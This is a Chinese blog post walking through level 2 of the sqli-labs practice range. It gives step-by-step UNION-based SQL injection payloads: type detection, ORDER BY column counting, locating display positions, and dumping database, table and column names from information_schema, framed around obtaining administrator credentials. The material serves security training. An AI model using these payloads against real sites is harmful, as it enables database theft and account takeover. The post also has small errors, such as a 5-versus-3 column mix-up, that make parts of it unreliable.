sql靶场第二题思路

晨曦
  2024-11-06 22:38:53 2024-11-06 22:38:53 创建   2024-11-06 14:42:15 2024-11-06 14:42:15 更新    647 字  2 分钟  

sql注入一般步骤:

第一步:通过特殊的数据库查询语句

第二步:在数据库的错误返回中找到sql漏洞

第三步:利用sql语句猜解管理人员信息并登录管理员后台

判断注入类型

数字型注入

  1. url为 http://url/?id=1'时,因为有一个多余的"单引号"使查询语句错误

  2. url为 http://url/?id=1 and 1=1时,没有报错

  3. url为 http://url/?id=1 and 1=2时,由于1=2不成立,也会报错

满足这三个,基本上就是数字注入了

字符型注入

  1. url为 http://url/?id=1'时,数据库认为id叫做1'。查询之后发现没有这个id而返回错误。(在字符型注入中,需要考虑引号的闭合)

  2. url为 http://url/?id=1 ‘ and ‘1’=’1 在’1’=’1之后没有加上’是因为传参时输入的内容已经被’ ‘包围。

后台查询列数

使用order by试出数据库列数

url为 http://url/?id=1 ‘ order by 数字 (如果试4时有错误,3时正确,那么列数为3)

找显示位

使用union select找出会返回客户端并显示的列。如果有3列时,应该这么写

url为 http://url/?id=1 ‘ union select 1,2,3

加入显示位是3,这就意味着数据库开放了5个“窗口”用来显示内容,用查询到的数据,在这些窗口显示数据

查库名

联合查询:select database();

下面是查看数据库的版本和数据库信息

假如显示位是3,http://url/?id=1 ‘ union select 1,version,database()

查表名

找到库名以后,使用http://url/?id=1 ‘ union select 1,2,table_name from information_schema.tables where table_schema=’库名’ (如果库名是字符型,此处库名要转成十六进制)

information_schema:

这是一个mysql自带的库,其中保存着关于mysql服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表列的数据类型与访问权限等,所以我们查询这个库

查列名

找到表之后,使用http://url/?id=1 ‘ union select 1,2,column_name from information_schema.columns where table_name=’表名’ (如果表名是字符型,此处库名要转成十六进制)

如果表数或列数过多,可以在最后使用limit加上limit 0,5相当于检索1-5条信息

查具体数据

找到列之后,使用http://127.0.0.1/sqli-labs/Less-2/?id=1 ‘ union select 1,2,group_concat(“要查询的数据”) from 表名

  • 标题: sql靶场第二题思路
  • 作者: 晨曦
  • 创建于 : 2024-11-06 22:38:53
  • 更新于 : 2024-11-06 14:42:15
  • 链接: https://blog.xuchengxi.tk/2024/11/06/sql注入/study2/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
目录
sql靶场第二题思路
  1. sql注入一般步骤:
    1. 第一步:通过特殊的数据库查询语句
    2. 第二步:在数据库的错误返回中找到sql漏洞
    3. 第三步:利用sql语句猜解管理人员信息并登录管理员后台
  2. 判断注入类型
    1. 数字型注入
    2. 字符型注入
    3. 后台查询列数
    4. 找显示位
    5. 查库名
    6. 查表名
    7. 查列名